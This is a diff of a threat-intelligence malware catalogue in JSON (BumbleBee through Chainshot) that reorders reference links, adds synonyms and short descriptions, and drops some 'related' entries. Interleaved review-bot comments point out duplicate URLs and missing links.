+ ],
+ "synonyms": [
+ "COLDTRAIN",
+ "SHELLSTING",
+ "Shindig"
],
- "synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "6fc4beee-b922-4d25-833d-8fb574a3c56e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "fa47d59d-7251-468f-9d84-6e1ba21887db",
"value": "BumbleBee"
},
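Review bot: this hunk adds the same source twice under slightly different URLs: `https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/` and the same path without the trailing slash, and the SANS ISC diaries 28636 and 28664 each appear under two paths (`/diary/28636` with `/diary/rss/28636`, and `/diary/rss/28664` with `/diary/Bumblebee+Malware+from+TransferXL+URLs/28664`). Canonicalize URLs (strip the trailing slash and the `rss/` segment) before comparing so each diary is listed once. The new synonyms COLDTRAIN, SHELLSTING and Shindig are welcome; the dropped `related` entry (dest-uuid 6fc4beee-b922-4d25-833d-8fb574a3c56e) is the same unexplained loss seen on the other clusters in this patch.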
@@ -15747,8 +16788,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner",
- "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf",
- "https://www.f-secure.com/weblog/archives/00002249.html"
+ "https://www.f-secure.com/weblog/archives/00002249.html",
+ "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf"
],
"synonyms": [
"0zapftis",
@@ -15764,13 +16805,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/",
- "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/",
- "https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/",
- "http://malware-traffic-analysis.net/2017/05/09/index.html",
"https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/",
- "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/"
+ "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/",
+ "http://malware-traffic-analysis.net/2017/05/09/index.html",
+ "https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/",
+ "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/"
],
"synonyms": [],
"type": []
@@ -15814,12 +16855,12 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby",
"https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
- "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
- "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/",
- "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/",
"https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
"https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan"
+ "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
+ "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/",
+ "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/"
],
"synonyms": [],
"type": []
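Review bot: the BYEBY refs now carry the Avast post both with and without a trailing slash (`.../high-profile-networks-in-central-asia` next to `.../central-asia/`) and the Unit 42 CMSTAR article under both its old and new host (`researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan` and `unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan`). The first pair is a plain duplicate; for the second keep the current host and drop the old one unless it no longer redirects.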
@@ -15856,37 +16897,46 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper",
+ "https://www.nioguard.com/2022/03/analysis-of-caddywiper.html",
+ "https://twitter.com/silascutler/status/1513870210398363651",
+ "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper",
"https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html",
"https://n0p.me/2022/03/2022-03-26-caddywiper/",
"https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-caddywiper",
- "https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html",
+ "https://cybersecuritynews.com/destructive-data-wiper-malware/",
"https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://www.nioguard.com/2022/03/analysis-of-caddywiper.html",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
- "https://cybernews.com/cyber-war/new-destructive-wiper-malware-deployed-in-ukraine/",
- "https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/",
- "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/",
- "https://twitter.com/ESETresearch/status/1503436420886712321",
- "https://www.truesec.com/hub/blog/analysis-of-caddywiper-wiper-targeting-ukraine",
"https://cert.gov.ua/article/39518",
- "https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/",
- "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine",
+ "https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html",
"https://securityintelligence.com/posts/caddywiper-malware-targeting-ukrainian-organizations/",
- "https://twitter.com/silascutler/status/1513870210398363651",
+ "https://cert.gov.ua/article/3718487",
"https://securityaffairs.co/wordpress/129069/cyber-warfare-2/caddywiper-wiper-hits-ukraine.html",
+ "https://www.truesec.com/hub/blog/analysis-of-caddywiper-wiper-targeting-ukraine",
+ "https://twitter.com/HackPatch/status/1503538555611607042",
+ "https://cybernews.com/cyber-war/new-destructive-wiper-malware-deployed-in-ukraine/",
+ "https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-caddywiper",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://twitter.com/ESETresearch/status/1503436420886712321",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
"https://www.splunk.com/en_us/blog/security/threat-update-caddywiper.html",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://cybersecuritynews.com/destructive-data-wiper-malware/",
+ "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/",
+ "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://twitter.com/HackPatch/status/1503538555611607042",
- "https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html",
"https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
- "https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine"
+ "https://www.mandiant.com/resources/blog/gru-rise-telegram-minions",
+ "https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/"
],
"synonyms": [
"KillDisk.NCX"
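Review bot: the trailing-slash duplicate of the Trustwave overview (`.../overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war` and the same URL with `/`) survives this regeneration as two unchanged context lines, and the ESET Industroyer2 post is listed under both `www.welivesecurity.com` and `blog.eset.ie`, so the export is not canonicalizing refs at all. A dedupe pass in the generator would fix this across every cluster rather than one entry at a time; the added `anatomy-of-wiper-malware-part-3` link beside `part-1` is fine.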
@@ -15901,23 +16951,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy",
- "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf"
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf",
+ "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets"
],
"synonyms": [
"Cadelle"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "38d6a0a1-0388-40d4-b8f4-1d58eeb9a07d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66",
"value": "CadelSpy"
},
@@ -15926,9 +16967,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn",
- "https://www.youtube.com/watch?v=3cUWjojQXWE",
"https://twitter.com/8th_grey_owl/status/1357550261963689985",
- "https://www.datanet.co.kr/news/articleView.html?idxno=133346"
+ "https://www.datanet.co.kr/news/articleView.html?idxno=133346",
+ "https://www.youtube.com/watch?v=3cUWjojQXWE"
],
"synonyms": [],
"type": []
@@ -15956,11 +16997,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader",
- "https://orangecyberdefense.com/global/blog/cybersoc/in-the-eye-of-our-cybersoc-campo-loader-analysis-and-detection-perspectives/",
"https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://orangecyberdefense.com/global/blog/cybersoc/in-the-eye-of-our-cybersoc-campo-loader-analysis-and-detection-perspectives/",
+ "https://blog.group-ib.com/prometheus-tds",
"https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
- "https://unit42.paloaltonetworks.com/bazarloader-malware/",
- "https://blog.group-ib.com/prometheus-tds"
+ "https://unit42.paloaltonetworks.com/bazarloader-malware/"
],
"synonyms": [],
"type": []
@@ -15999,9 +17040,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon",
- "https://unit42.paloaltonetworks.com/atoms/fighting-ursa/",
+ "https://www.vkremez.com/2018/11/lets-learn-in-depth-on-sofacy-canon.html",
"https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/",
- "https://www.vkremez.com/2018/11/lets-learn-in-depth-on-sofacy-canon.html"
+ "https://unit42.paloaltonetworks.com/atoms/fighting-ursa/"
],
"synonyms": [],
"type": []
@@ -16010,29 +17051,33 @@
"value": "Cannon"
},
{
- "description": "",
+ "description": "MyCERT states that Carbanak is a remote backdoor designed for espionage, data exfiltration, and to remote control.\r\n\r\nThe attacker deploy malware via spear phishing email to lure the user to open and run the malicious attachment that will infect the machine. The main objective of this campaign is primarily to remotely control the infected machine and gain control of the internal destinations of money processing services such as Automated Teller Machines(ATM) and financial accounts. The following information are the malware capabilities:\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak",
- "https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
- "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html",
- "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
- "https://threatintel.blog/OPBlueRaven-Part2/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
- "https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.mandiant.com/resources/evolution-of-fin7",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://unit42.paloaltonetworks.com/atoms/mulelibra/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html",
- "https://threatintel.blog/OPBlueRaven-Part1/",
- "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html",
- "https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://threatintel.blog/OPBlueRaven-Part2/",
+ "https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
"https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html",
- "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html"
+ "https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://threatintel.blog/OPBlueRaven-Part1/",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html",
+ "https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/",
+ "https://www.prodaft.com/m/reports/FIN7_TLPCLEAR.pdf",
+ "https://www.mandiant.com/resources/evolution-of-fin7",
+ "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html",
+ "https://unit42.paloaltonetworks.com/atoms/mulelibra/",
+ "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html"
],
"synonyms": [
"Anunak",
@@ -16048,10 +17093,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp",
- "https://cdn1.esetstatic.com/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf",
+ "https://blog.avast.com/2013/04/08/carberp_epitaph/",
"https://web.archive.org/web/20150713145858/http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://blog.avast.com/2013/04/08/carberp_epitaph/"
+ "https://cdn1.esetstatic.com/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree"
],
"synonyms": [],
"type": []
@@ -16064,26 +17111,33 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
"http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412",
- "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
"https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection"
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "1d9fbf33-faea-40c1-b543-c7b39561f0ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e",
"value": "Cardinal RAT"
},
+ {
+ "description": "CargoBay is a newer malware family which was first observed in 2022 and is notable for being written in the Rust language. CargoBay is likely based on source code taken from 'Black Hat Rust' GitHub project (https://github.com/skerkour/black-hat-rust). CargoBay is usually distributed via phishing emails, and the malware binaries may be disguised as legitimate applications. Upon execution, the malware starts by performing environmental checks such as checking its execution path and the configured system language. If the tests pass, then the malware proceeds to gather basic system information and register with its C2 via HTTP from which it receives JSON-formatted jobs to carry out. CargoBay can execute commands via the command line and downloading additional malware binaries.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cargobay",
+ "https://exchange.xforce.ibmcloud.com/malware-analysis/guid:87abff769352d8208e403331c86eb95f"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cfdc931d-d3da-4b2a-9fef-42592c0f5c5f",
+ "value": "CargoBay"
+ },
{
"description": "CARROTBALL is a simple FTP downloader built to deploy SYSCON, a Remote Access Trojan used by the same threat actor. Discovered by Unit 42 in late 2019, the downloader was adopted for use in spear phishing attacks against US government agencies.",
"meta": {
@@ -16121,18 +17175,23 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "63b3e6fb-9bb8-43dc-9cbf-7681b049b5d6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3198501e-0ff0-43b7-96f0-321b463ab656",
"value": "Casper"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.catb",
+ "https://minerva-labs.com/blog/new-catb-ransomware-employs-2-year-old-dll-hijacking-technique-to-evade-detection/",
+ "https://www.sentinelone.com/blog/decrypting-catb-ransomware-analyzing-their-latest-attack-methods/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a96445d6-4bbb-4b9a-a761-83759108a403",
+ "value": "CatB"
+ },
{
"description": "",
"meta": {
@@ -16147,31 +17206,31 @@
"value": "Catchamas"
},
{
- "description": "",
+ "description": "According to CrowdStrike, this backdoor was discovered embedded in the legitimate, signed version of CCleaner 5.33, and thus constitutes a supply chain attack.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor",
- "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
- "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor",
"https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://risky.biz/whatiswinnti/",
- "https://stmxcsr.com/persistence/print-processor.html",
- "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
- "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms",
- "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html",
- "https://blog.avast.com/progress-on-ccleaner-investigation",
- "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/",
- "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident",
"https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities",
- "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/",
- "https://twitter.com/craiu/status/910148928796061696",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/",
- "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/",
- "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer",
+ "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms",
"https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident",
- "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html"
+ "https://risky.biz/whatiswinnti/",
+ "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
+ "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/",
+ "https://blog.avast.com/progress-on-ccleaner-investigation",
+ "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer",
+ "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/",
+ "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident",
+ "https://twitter.com/craiu/status/910148928796061696",
+ "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/",
+ "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/",
+ "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor",
+ "https://stmxcsr.com/persistence/print-processor.html",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
+ "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
+ "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html"
],
"synonyms": [
"DIRTCLEANER"
@@ -16181,6 +17240,19 @@
"uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139",
"value": "CCleaner Backdoor"
},
+ {
+ "description": "Mandiant characterizes this malware as a downloader and shellcode stager.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ceeloader",
+ "https://www.mandiant.com/resources/blog/russian-targeting-gov-business"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0333d13e-e01f-46cd-a030-448bbf043c10",
+ "value": "CEELOADER"
+ },
{
"description": "",
"meta": {
@@ -16201,22 +17273,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/",
- "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html",
+ "https://www.youtube.com/watch?v=y8Z9KnL8s8s",
"https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/",
+ "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
"https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
"http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.youtube.com/watch?v=y8Z9KnL8s8s"
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus"
],
"synonyms": [],
"type": []
@@ -16281,24 +17354,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot",
- "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack",
- "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/",
"https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/",
+ "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/",
"https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec",
- "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/"
+ "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack",
+ "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a032460e-c54c-11e8-9965-43b7b6469a65",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "36f9a5e0-9a78-4b9a-9072-1596c91b59b6",
"value": "Chainshot"
},
